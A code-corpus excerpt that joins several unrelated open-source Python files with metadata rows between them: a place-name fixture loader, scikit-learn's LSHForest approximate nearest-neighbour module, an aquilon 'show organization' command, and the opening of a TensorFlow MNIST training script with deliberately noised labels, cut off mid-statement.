loader.save(create_countries_place(23,22,['Aalst-bij-Sint-Truiden', '', ''],u'BE',u'3800',u'70',False,u''))
loader.save(create_countries_place(24,None,['L\xfcttich', 'Li\xe8ge', 'Li\xe8ge'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(25,24,['L\xfcttich', 'Li\xe8ge', 'Li\xe8ge'],u'BE',u'4000',u'50',False,u''))
loader.save(create_countries_place(26,24,['B\xfctgenbach', 'Butgenbach', 'Butgenbach'],u'BE',u'4750',u'50',False,u'63013'))
loader.save(create_countries_place(27,24,['B\xfcllingen', 'Bullange', 'B\xfcllingen'],u'BE',u'4760',u'50',False,u'63012'))
loader.save(create_countries_place(28,24,['Sankt Vith', 'Saint-Vith', 'Sankt Vith'],u'BE',u'4780',u'50',False,u'63067'))
loader.save(create_countries_place(29,24,['Recht', 'Recht', 'Recht'],u'BE',u'4780',u'50',False,u'63067'))
loader.save(create_countries_place(30,24,['Baelen', 'Baelen', 'Baelen'],u'BE',u'4837',u'50',False,u''))
loader.save(create_countries_place(31,None,['Hennegau', 'Hainaut', 'Hainaut'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(32,None,['Wallonisch-Brabant', 'Brabant wallon', 'Brabant wallon'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(33,None,['Fl\xe4misch-Brabant', 'Brabant flamant', 'Brabant flamant'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(34,None,['Ostflandern', "Flandre de l'Est", "Flandre de l'Est"],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(35,34,['Aalst', 'Alost', 'Aalst'],u'BE',u'9300',u'50',False,u'41002'))
loader.save(create_countries_place(36,35,['Gijzegem', '', ''],u'BE',u'9308',u'70',False,u'41002'))
loader.save(create_countries_place(37,35,['Baardegem', '', ''],u'BE',u'9310',u'70',False,u'41002'))
loader.save(create_countries_place(38,35,['Erembodegem', '', ''],u'BE',u'9320',u'70',False,u''))
loader.save(create_countries_place(39,35,['Herdersem', '', ''],u'BE',u'9310',u'70',False,u'41002'))
loader.save(create_countries_place(40,35,['Hofstade', '', ''],u'BE',u'9308',u'70',False,u''))
loader.save(create_countries_place(41,35,['Meldert', '', ''],u'BE',u'9310',u'70',False,u''))
loader.save(create_countries_place(42,35,['Nieuwerkerken', '', ''],u'BE',u'9320',u'70',False,u''))
loader.save(create_countries_place(43,35,['Moorsel', '', ''],u'BE',u'9310',u'70',False,u'41002'))
loader.save(create_countries_place(44,None,['Westflandern', "Flandre de l'Ouest", "Flandre de l'Ouest"],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(45,None,['Br\xfcssel', 'Bruxelles', 'Brussels'],u'BE',u'1000',u'50',False,u''))
loader.save(create_countries_place(46,None,['Bergen', 'Mons', 'Mons'],u'BE',u'7000',u'50',False,u''))
loader.save(create_countries_place(47,None,['Ostende', 'Ostende', 'Ostende'],u'BE',u'8400',u'50',False,u''))
loader.save(create_countries_place(48,None,['Nam\xfcr', 'Namur', 'Namur'],u'BE',u'5000',u'50',False,u''))
loader.save(create_countries_place(49,None,['Harju', '', ''],u'EE',u'',u'20',False,u''))
loader.save(create_countries_place(50,None,['P\xe4rnu', '', ''],u'EE',u'',u'20',False,u''))
loader.save(create_countries_place(51,None,['Rapla', '', ''],u'EE',u'',u'20',False,u''))
loader.save(create_countries_place(52,51,['Vigala', '', ''],u'EE',u'',u'52',False,u''))
loader.save(create_countries_place(53,51,['Rapla', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(54,49,['Tallinn', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(55,54,['Kesklinn', '', ''],u'EE',u'',u'55',False,u''))
loader.save(create_countries_place(56,54,['P\xf5hja-Tallinn', '', ''],u'EE',u'',u'55',False,u''))
loader.save(create_countries_place(57,50,['P\xe4rnu', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(58,None,['Tartu', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(59,None,['Narva', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(60,49,['\xc4\xe4sm\xe4e', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(61,None,['Aachen', 'Aix-la-Chapelle', 'Aachen'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(62,None,['K\xf6ln', 'Cologne', 'Cologne'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(63,None,['Berlin', '', ''],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(64,None,['Hamburg', '', ''],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(65,None,['M\xfcnchen', 'Munich', 'Munich'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(66,None,['Monschau', 'Montjoie', 'Monschau'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(67,None,['Maastricht', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(68,None,['Amsterdam', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(69,None,['Den Haag', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(70,None,['Rotterdam', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(71,None,['Utrecht', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(72,None,['Breda', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(73,None,['Paris', 'Paris', 'Paris'],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(74,None,['Nizza', 'Nice', 'Nice'],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(75,None,['Metz', '', ''],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(76,None,['Strasbourg', '', ''],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(77,None,['Nancy', '', ''],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(78,None,['Marseille', '', ''],u'FR',u'',u'50',False,u''))
loader.flush_deferred_objects()
| agpl-3.0 | 3,086,057,760,075,443,700 | 96.289157 | 132 | 0.648297 | false |
rvraghav93/scikit-learn | sklearn/neighbors/approximate.py | 3 | 22554 | """Approximate nearest neighbor search"""
# Author: Maheshakya Wijewardena <[email protected]>
# Joel Nothman <[email protected]>
import numpy as np
import warnings
from scipy import sparse
from .base import KNeighborsMixin, RadiusNeighborsMixin
from ..base import BaseEstimator
from ..utils.validation import check_array
from ..utils import check_random_state
from ..metrics.pairwise import pairwise_distances
from ..random_projection import GaussianRandomProjection
__all__ = ["LSHForest"]
HASH_DTYPE = '>u4'
MAX_HASH_SIZE = np.dtype(HASH_DTYPE).itemsize * 8
def _find_matching_indices(tree, bin_X, left_mask, right_mask):
"""Finds indices in sorted array of integers.
Most significant h bits in the binary representations of the
integers are matched with the items' most significant h bits.
"""
left_index = np.searchsorted(tree, bin_X & left_mask)
right_index = np.searchsorted(tree, bin_X | right_mask,
side='right')
return left_index, right_index
def _find_longest_prefix_match(tree, bin_X, hash_size,
left_masks, right_masks):
"""Find the longest prefix match in tree for each query in bin_X
Most significant bits are considered as the prefix.
"""
hi = np.empty_like(bin_X, dtype=np.intp)
hi.fill(hash_size)
lo = np.zeros_like(bin_X, dtype=np.intp)
res = np.empty_like(bin_X, dtype=np.intp)
left_idx, right_idx = _find_matching_indices(tree, bin_X,
left_masks[hi],
right_masks[hi])
found = right_idx > left_idx
res[found] = lo[found] = hash_size
r = np.arange(bin_X.shape[0])
kept = r[lo < hi] # indices remaining in bin_X mask
while kept.shape[0]:
mid = (lo.take(kept) + hi.take(kept)) // 2
left_idx, right_idx = _find_matching_indices(tree,
bin_X.take(kept),
left_masks[mid],
right_masks[mid])
found = right_idx > left_idx
mid_found = mid[found]
lo[kept[found]] = mid_found + 1
res[kept[found]] = mid_found
hi[kept[~found]] = mid[~found]
kept = r[lo < hi]
return res
class ProjectionToHashMixin(object):
"""Turn a transformed real-valued array into a hash"""
@staticmethod
def _to_hash(projected):
if projected.shape[1] % 8 != 0:
raise ValueError('Require reduced dimensionality to be a multiple '
'of 8 for hashing')
# XXX: perhaps non-copying operation better
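# Pack the signs of the projections into bits, 32 per big-endian uint32
# (HASH_DTYPE), so each row becomes a fixed-length binary fingerprint.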
out = np.packbits((projected > 0).astype(int)).view(dtype=HASH_DTYPE)
return out.reshape(projected.shape[0], -1)
def fit_transform(self, X, y=None):
self.fit(X)
return self.transform(X)
def transform(self, X):
return self._to_hash(super(ProjectionToHashMixin, self).transform(X))
class GaussianRandomProjectionHash(ProjectionToHashMixin,
GaussianRandomProjection):
"""Use GaussianRandomProjection to produce a cosine LSH fingerprint"""
def __init__(self,
n_components=32,
random_state=None):
super(GaussianRandomProjectionHash, self).__init__(
n_components=n_components,
random_state=random_state)
def _array_of_arrays(list_of_arrays):
"""Creates an array of array from list of arrays."""
out = np.empty(len(list_of_arrays), dtype=object)
out[:] = list_of_arrays
return out
class LSHForest(BaseEstimator, KNeighborsMixin, RadiusNeighborsMixin):
"""Performs approximate nearest neighbor search using LSH forest.
LSH Forest: Locality Sensitive Hashing forest [1] is an alternative
to vanilla approximate nearest neighbor search methods.
LSH forest data structure has been implemented using sorted
arrays and binary search and 32 bit fixed-length hashes.
Random projection is used as the hash family which approximates
cosine distance.
The cosine distance is defined as ``1 - cosine_similarity``: the lowest
value is 0 (identical point) but it is bounded above by 2 for the farthest
points. Its value does not depend on the norm of the vector points but
only on their relative angles.
Read more in the :ref:`User Guide <approximate_nearest_neighbors>`.
Parameters
----------
n_estimators : int (default = 10)
Number of trees in the LSH Forest.
min_hash_match : int (default = 4)
lowest hash length to be searched when candidate selection is
performed for nearest neighbors.
n_candidates : int (default = 50)
Minimum number of candidates evaluated per estimator, assuming enough
items meet the `min_hash_match` constraint.
n_neighbors : int (default = 5)
Number of neighbors to be returned from query function when
it is not provided to the :meth:`kneighbors` method.
radius : float, optional (default = 1.0)
Radius from the data point to its neighbors. This is the parameter
space to use by default for the :meth:`radius_neighbors` queries.
radius_cutoff_ratio : float, optional (default = 0.9)
A value ranges from 0 to 1. Radius neighbors will be searched until
the ratio between total neighbors within the radius and the total
candidates becomes less than this value unless it is terminated by
hash length reaching `min_hash_match`.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
hash_functions_ : list of GaussianRandomProjectionHash objects
Hash function g(p,x) for a tree is an array of 32 randomly generated
float arrays with the same dimension as the data set. This array is
stored in GaussianRandomProjectionHash object and can be obtained
from ``components_`` attribute.
trees_ : array, shape (n_estimators, n_samples)
Each tree (corresponding to a hash function) contains an array of
sorted hashed values. The array representation may change in future
versions.
original_indices_ : array, shape (n_estimators, n_samples)
Original indices of sorted hashed values in the fitted index.
References
----------
.. [1] M. Bawa, T. Condie and P. Ganesan, "LSH Forest: Self-Tuning
Indexes for Similarity Search", WWW '05 Proceedings of the
14th international conference on World Wide Web, 651-660,
2005.
Examples
--------
>>> from sklearn.neighbors import LSHForest
>>> X_train = [[5, 5, 2], [21, 5, 5], [1, 1, 1], [8, 9, 1], [6, 10, 2]]
>>> X_test = [[9, 1, 6], [3, 1, 10], [7, 10, 3]]
>>> lshf = LSHForest(random_state=42)
>>> lshf.fit(X_train) # doctest: +NORMALIZE_WHITESPACE
LSHForest(min_hash_match=4, n_candidates=50, n_estimators=10,
n_neighbors=5, radius=1.0, radius_cutoff_ratio=0.9,
random_state=42)
>>> distances, indices = lshf.kneighbors(X_test, n_neighbors=2)
>>> distances # doctest: +ELLIPSIS
array([[ 0.069..., 0.149...],
[ 0.229..., 0.481...],
[ 0.004..., 0.014...]])
>>> indices
array([[1, 2],
[2, 0],
[4, 0]])
"""
def __init__(self, n_estimators=10, radius=1.0, n_candidates=50,
n_neighbors=5, min_hash_match=4, radius_cutoff_ratio=.9,
random_state=None):
self.n_estimators = n_estimators
self.radius = radius
self.random_state = random_state
self.n_candidates = n_candidates
self.n_neighbors = n_neighbors
self.min_hash_match = min_hash_match
self.radius_cutoff_ratio = radius_cutoff_ratio
warnings.warn("LSHForest has poor performance and has been deprecated "
"in 0.19. It will be removed in version 0.21.",
DeprecationWarning)
def _compute_distances(self, query, candidates):
"""Computes the cosine distance.
Distance is from the query to points in the candidates array.
Returns argsort of distances in the candidates
array and sorted distances.
"""
if candidates.shape == (0,):
# needed since _fit_X[np.array([])] doesn't work if _fit_X sparse
return np.empty(0, dtype=np.int), np.empty(0, dtype=float)
if sparse.issparse(self._fit_X):
candidate_X = self._fit_X[candidates]
else:
candidate_X = self._fit_X.take(candidates, axis=0, mode='clip')
distances = pairwise_distances(query, candidate_X,
metric='cosine')[0]
distance_positions = np.argsort(distances)
distances = distances.take(distance_positions, mode='clip', axis=0)
return distance_positions, distances
def _generate_masks(self):
"""Creates left and right masks for all hash lengths."""
tri_size = MAX_HASH_SIZE + 1
# Called once on fitting, output is independent of hashes
left_mask = np.tril(np.ones((tri_size, tri_size), dtype=int))[:, 1:]
right_mask = left_mask[::-1, ::-1]
self._left_mask = np.packbits(left_mask).view(dtype=HASH_DTYPE)
self._right_mask = np.packbits(right_mask).view(dtype=HASH_DTYPE)
def _get_candidates(self, query, max_depth, bin_queries, n_neighbors):
"""Performs the Synchronous ascending phase.
Returns an array of candidates, their distance ranks and
distances.
"""
index_size = self._fit_X.shape[0]
# Number of candidates considered including duplicates
# XXX: not sure whether this is being calculated correctly wrt
# duplicates from different iterations through a single tree
n_candidates = 0
candidate_set = set()
min_candidates = self.n_candidates * self.n_estimators
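# Synchronous ascending phase: repeatedly shorten the required matched
# prefix (max_depth) until enough distinct candidates are collected or the
# minimum hash match length is reached.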
while (max_depth > self.min_hash_match and
(n_candidates < min_candidates or
len(candidate_set) < n_neighbors)):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
n_candidates += stop - start
candidate_set.update(
self.original_indices_[i][start:stop].tolist())
max_depth -= 1
candidates = np.fromiter(candidate_set, count=len(candidate_set),
dtype=np.intp)
# For insufficient candidates, candidates are filled.
# Candidates are filled from unselected indices uniformly.
if candidates.shape[0] < n_neighbors:
warnings.warn(
"Number of candidates is not sufficient to retrieve"
" %i neighbors with"
" min_hash_match = %i. Candidates are filled up"
" uniformly from unselected"
" indices." % (n_neighbors, self.min_hash_match))
remaining = np.setdiff1d(np.arange(0, index_size), candidates)
to_fill = n_neighbors - candidates.shape[0]
candidates = np.concatenate((candidates, remaining[:to_fill]))
ranks, distances = self._compute_distances(query,
candidates.astype(int))
return (candidates[ranks[:n_neighbors]],
distances[:n_neighbors])
def _get_radius_neighbors(self, query, max_depth, bin_queries, radius):
"""Finds radius neighbors from the candidates obtained.
Their distances from query are smaller than radius.
Returns radius neighbors and distances.
"""
ratio_within_radius = 1
threshold = 1 - self.radius_cutoff_ratio
total_candidates = np.array([], dtype=int)
total_neighbors = np.array([], dtype=int)
total_distances = np.array([], dtype=float)
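# Keep relaxing the prefix constraint while a sufficiently large fraction of
# the retrieved candidates still falls within the requested radius.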
while (max_depth > self.min_hash_match and
ratio_within_radius > threshold):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
candidates = []
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
candidates.extend(
self.original_indices_[i][start:stop].tolist())
candidates = np.setdiff1d(candidates, total_candidates)
total_candidates = np.append(total_candidates, candidates)
ranks, distances = self._compute_distances(query, candidates)
m = np.searchsorted(distances, radius, side='right')
positions = np.searchsorted(total_distances, distances[:m])
total_neighbors = np.insert(total_neighbors, positions,
candidates[ranks[:m]])
total_distances = np.insert(total_distances, positions,
distances[:m])
ratio_within_radius = (total_neighbors.shape[0] /
float(total_candidates.shape[0]))
max_depth = max_depth - 1
return total_neighbors, total_distances
def fit(self, X, y=None):
"""Fit the LSH forest on the data.
This creates binary hashes of input data points by getting the
dot product of input points and hash_function then
transforming the projection into a binary string array based
on the sign (positive/negative) of the projection.
A sorted array of binary hashes is created.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
Returns
-------
self : object
Returns self.
"""
self._fit_X = check_array(X, accept_sparse='csr')
# Creates a g(p,x) for each tree
self.hash_functions_ = []
self.trees_ = []
self.original_indices_ = []
rng = check_random_state(self.random_state)
int_max = np.iinfo(np.int32).max
for i in range(self.n_estimators):
# This is g(p,x) for a particular tree.
# Builds a single tree. Hashing is done on an array of data points.
# `GaussianRandomProjection` is used for hashing.
# `n_components` = hash size and `n_features` = n_dim.
hasher = GaussianRandomProjectionHash(MAX_HASH_SIZE,
rng.randint(0, int_max))
hashes = hasher.fit_transform(self._fit_X)[:, 0]
original_index = np.argsort(hashes)
bin_hashes = hashes[original_index]
self.original_indices_.append(original_index)
self.trees_.append(bin_hashes)
self.hash_functions_.append(hasher)
self._generate_masks()
return self
def _query(self, X):
"""Performs descending phase to find maximum depth."""
# Calculate hashes of shape (n_samples, n_estimators, [hash_size])
bin_queries = np.asarray([hasher.transform(X)[:, 0]
for hasher in self.hash_functions_])
bin_queries = np.rollaxis(bin_queries, 1)
# descend phase
depths = [_find_longest_prefix_match(tree, tree_queries, MAX_HASH_SIZE,
self._left_mask, self._right_mask)
for tree, tree_queries in zip(self.trees_,
np.rollaxis(bin_queries, 1))]
return bin_queries, np.max(depths, axis=0)
def kneighbors(self, X, n_neighbors=None, return_distance=True):
"""Returns n_neighbors of approximate nearest neighbors.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single query.
n_neighbors : int, optional (default = None)
Number of neighbors required. If not provided, this will
return the number specified at the initialization.
return_distance : boolean, optional (default = True)
Returns the distances of neighbors if set to True.
Returns
-------
dist : array, shape (n_samples, n_neighbors)
Array representing the cosine distances to each point,
only present if return_distance=True.
ind : array, shape (n_samples, n_neighbors)
Indices of the approximate nearest points in the population
matrix.
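        Examples
        --------
        An illustrative sketch (added commentary; it assumes the enclosing
        class is the ``LSHForest`` estimator):
        >>> import numpy as np
        >>> rng = np.random.RandomState(0)
        >>> X = rng.rand(20, 5)
        >>> lshf = LSHForest(n_estimators=3, random_state=0).fit(X)
        >>> dist, ind = lshf.kneighbors(X[:2], n_neighbors=3)
        >>> dist.shape, ind.shape
        ((2, 3), (2, 3))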
"""
if not hasattr(self, 'hash_functions_'):
raise ValueError("estimator should be fitted.")
if n_neighbors is None:
n_neighbors = self.n_neighbors
X = check_array(X, accept_sparse='csr')
neighbors, distances = [], []
bin_queries, max_depth = self._query(X)
for i in range(X.shape[0]):
neighs, dists = self._get_candidates(X[[i]], max_depth[i],
bin_queries[i],
n_neighbors)
neighbors.append(neighs)
distances.append(dists)
if return_distance:
return np.array(distances), np.array(neighbors)
else:
return np.array(neighbors)
def radius_neighbors(self, X, radius=None, return_distance=True):
"""Finds the neighbors within a given radius of a point or points.
Return the indices and distances of some points from the dataset
lying in a ball with size ``radius`` around the points of the query
array. Points lying on the boundary are included in the results.
The result points are *not* necessarily sorted by distance to their
query point.
LSH Forest being an approximate method, some true neighbors from the
indexed dataset might be missing from the results.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single query.
radius : float
Limiting distance of neighbors to return.
(default is the value passed to the constructor).
return_distance : boolean, optional (default = False)
Returns the distances of neighbors if set to True.
Returns
-------
dist : array, shape (n_samples,) of arrays
Each element is an array representing the cosine distances
to some points found within ``radius`` of the respective query.
Only present if ``return_distance=True``.
ind : array, shape (n_samples,) of arrays
Each element is an array of indices for neighbors within ``radius``
of the respective query.
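        Examples
        --------
        An illustrative sketch (added commentary; it assumes the enclosing
        class is the ``LSHForest`` estimator):
        >>> import numpy as np
        >>> rng = np.random.RandomState(0)
        >>> X = rng.rand(20, 5)
        >>> lshf = LSHForest(random_state=0).fit(X)
        >>> dist, ind = lshf.radius_neighbors(X[:1], radius=0.2)
        >>> dist.shape, ind.shape
        ((1,), (1,))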
"""
if not hasattr(self, 'hash_functions_'):
raise ValueError("estimator should be fitted.")
if radius is None:
radius = self.radius
X = check_array(X, accept_sparse='csr')
neighbors, distances = [], []
bin_queries, max_depth = self._query(X)
for i in range(X.shape[0]):
neighs, dists = self._get_radius_neighbors(X[[i]], max_depth[i],
bin_queries[i], radius)
neighbors.append(neighs)
distances.append(dists)
if return_distance:
return _array_of_arrays(distances), _array_of_arrays(neighbors)
else:
return _array_of_arrays(neighbors)
def partial_fit(self, X, y=None):
"""
Inserts new data into the already fitted LSH Forest.
Cost is proportional to new total size, so additions
should be batched.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
New data point to be inserted into the LSH Forest.
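        Examples
        --------
        An illustrative sketch (added commentary; it assumes the enclosing
        class is the ``LSHForest`` estimator):
        >>> import numpy as np
        >>> rng = np.random.RandomState(0)
        >>> lshf = LSHForest(random_state=0).fit(rng.rand(10, 4))
        >>> _ = lshf.partial_fit(rng.rand(5, 4))  # index five more points
        >>> lshf._fit_X.shape
        (15, 4)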
"""
X = check_array(X, accept_sparse='csr')
if not hasattr(self, 'hash_functions_'):
return self.fit(X)
if X.shape[1] != self._fit_X.shape[1]:
raise ValueError("Number of features in X and"
" fitted array does not match.")
n_samples = X.shape[0]
n_indexed = self._fit_X.shape[0]
for i in range(self.n_estimators):
bin_X = self.hash_functions_[i].transform(X)[:, 0]
# gets the position to be added in the tree.
positions = self.trees_[i].searchsorted(bin_X)
# adds the hashed value into the tree.
self.trees_[i] = np.insert(self.trees_[i],
positions, bin_X)
# add the entry into the original_indices_.
self.original_indices_[i] = np.insert(self.original_indices_[i],
positions,
np.arange(n_indexed,
n_indexed +
n_samples))
# adds the entry into the input_array.
if sparse.issparse(X) or sparse.issparse(self._fit_X):
self._fit_X = sparse.vstack((self._fit_X, X))
else:
self._fit_X = np.row_stack((self._fit_X, X))
return self
| bsd-3-clause | -1,901,045,247,280,568,600 | 39.711191 | 79 | 0.579365 | false |
stdweird/aquilon | lib/python2.6/aquilon/worker/commands/show_organization_all.py | 2 | 1252 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq show organization`."""
from aquilon.worker.broker import BrokerCommand # pylint: disable=W0611
from aquilon.worker.commands.show_location_type import CommandShowLocationType
class CommandShowOrganizationAll(CommandShowLocationType):
required_parameters = []
def render(self, session, **arguments):
return CommandShowLocationType.render(self, session=session,
type='company', name=None,
**arguments)
| apache-2.0 | -456,685,246,226,888,300 | 39.387097 | 78 | 0.702077 | false |
wangxianliang/facenet | tmp/mnist_noise_labels.py | 1 | 15390 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple, end-to-end, LeNet-5-like convolutional MNIST model example.
This should achieve a test error of 0.7%. Please keep this model as simple and
linear as possible, it is meant as a tutorial for simple convolutional models.
Run with --self_test on the command line to execute a short self-test.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import sys
import time
from six.moves import urllib  # @UnresolvedImport
from six.moves import xrange  # pylint: disable=redefined-builtin
import tensorflow as tf
import numpy as np
SOURCE_URL = 'http://yann.lecun.com/exdb/mnist/'
WORK_DIRECTORY = 'data'
IMAGE_SIZE = 28
NUM_CHANNELS = 1
PIXEL_DEPTH = 255
NUM_LABELS = 10
VALIDATION_SIZE = 5000 # Size of the validation set.
SEED = 66478 # Set to None for random seed.
BATCH_SIZE = 64
NUM_EPOCHS = 10
EVAL_BATCH_SIZE = 64
EVAL_FREQUENCY = 100 # Number of steps between evaluations.
NOISE_FACTOR = 0.2
BETA = 0.8
tf.app.flags.DEFINE_boolean("self_test", False, "True if running a self test.")
tf.app.flags.DEFINE_boolean('use_fp16', False,
"Use half floats instead of full floats if True.")
FLAGS = tf.app.flags.FLAGS
def data_type():
"""Return the type of the activations, weights, and placeholder variables."""
if FLAGS.use_fp16:
return tf.float16
else:
return tf.float32
def maybe_download(filename):
"""Download the data from Yann's website, unless it's already here."""
if not tf.gfile.Exists(WORK_DIRECTORY):
tf.gfile.MakeDirs(WORK_DIRECTORY)
filepath = os.path.join(WORK_DIRECTORY, filename)
if not tf.gfile.Exists(filepath):
filepath, _ = urllib.request.urlretrieve(SOURCE_URL + filename, filepath)
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
return filepath
def extract_data(filename, num_images):
"""Extract the images into a 4D tensor [image index, y, x, channels].
Values are rescaled from [0, 255] down to [-0.5, 0.5].
"""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(16)
buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)
data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32)
data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH
data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)
return data
def extract_labels(filename, num_images):
"""Extract the labels into a vector of int64 label IDs."""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(8)
buf = bytestream.read(1 * num_images)
labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)
return labels
def fake_data(num_images):
"""Generate a fake dataset that matches the dimensions of MNIST."""
data = np.ndarray(
shape=(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS),
dtype=np.float32)
labels = np.zeros(shape=(num_images,), dtype=np.int64)
for image in range(num_images):
label = image % 2
data[image, :, :, 0] = label - 0.5
labels[image] = label
return data, labels
def error_rate(predictions, labels):
"""Return the error rate based on dense predictions and sparse labels."""
return 100.0 - (
100.0 *
np.sum(np.argmax(predictions, 1) == labels) /
predictions.shape[0])
def main(argv=None): # pylint: disable=unused-argument
if FLAGS.self_test:
print('Running self-test.')
train_data, train_labels = fake_data(256)
validation_data, validation_labels = fake_data(EVAL_BATCH_SIZE)
test_data, test_labels = fake_data(EVAL_BATCH_SIZE)
num_epochs = 1
else:
# Get the data.
train_data_filename = maybe_download('train-images-idx3-ubyte.gz')
train_labels_filename = maybe_download('train-labels-idx1-ubyte.gz')
test_data_filename = maybe_download('t10k-images-idx3-ubyte.gz')
test_labels_filename = maybe_download('t10k-labels-idx1-ubyte.gz')
# Extract it into numpy arrays.
train_data = extract_data(train_data_filename, 60000)
train_labels = extract_labels(train_labels_filename, 60000)
test_data = extract_data(test_data_filename, 10000)
test_labels = extract_labels(test_labels_filename, 10000)
# Generate a validation set.
validation_data = train_data[:VALIDATION_SIZE, ...]
validation_labels = train_labels[:VALIDATION_SIZE]
train_data = train_data[VALIDATION_SIZE:, ...]
train_labels = train_labels[VALIDATION_SIZE:]
    # Corrupt a fraction (NOISE_FACTOR) of the training labels by shifting
    # each selected label to a different, randomly chosen class.
    nrof_training_examples = train_labels.shape[0]
    nrof_changed_labels = int(nrof_training_examples * NOISE_FACTOR)
    shuf = np.arange(0, nrof_training_examples)
    np.random.shuffle(shuf)
    change_idx = shuf[0:nrof_changed_labels]
    # Adding an offset in [1, NUM_LABELS - 1] modulo NUM_LABELS guarantees the
    # new label differs from the original one.
    train_labels[change_idx] = (train_labels[change_idx] + np.random.randint(
        1, NUM_LABELS, size=(nrof_changed_labels,))) % NUM_LABELS
num_epochs = NUM_EPOCHS
train_size = train_labels.shape[0]
# This is where training samples and labels are fed to the graph.
# These placeholder nodes will be fed a batch of training data at each
# training step using the {feed_dict} argument to the Run() call below.
train_data_node = tf.placeholder(
data_type(),
shape=(BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
train_labels_node = tf.placeholder(tf.int64, shape=(BATCH_SIZE,))
eval_data = tf.placeholder(
data_type(),
shape=(EVAL_BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
# The variables below hold all the trainable weights. They are passed an
# initial value which will be assigned when we call:
# {tf.global_variables_initializer().run()}
conv1_weights = tf.Variable(
tf.truncated_normal([5, 5, NUM_CHANNELS, 32], # 5x5 filter, depth 32.
stddev=0.1,
seed=SEED, dtype=data_type()))
conv1_biases = tf.Variable(tf.zeros([32], dtype=data_type()))
conv2_weights = tf.Variable(tf.truncated_normal(
[5, 5, 32, 64], stddev=0.1,
seed=SEED, dtype=data_type()))
conv2_biases = tf.Variable(tf.constant(0.1, shape=[64], dtype=data_type()))
fc1_weights = tf.Variable( # fully connected, depth 512.
tf.truncated_normal([IMAGE_SIZE // 4 * IMAGE_SIZE // 4 * 64, 512],
stddev=0.1,
seed=SEED,
dtype=data_type()))
fc1_biases = tf.Variable(tf.constant(0.1, shape=[512], dtype=data_type()))
fc2_weights = tf.Variable(tf.truncated_normal([512, NUM_LABELS],
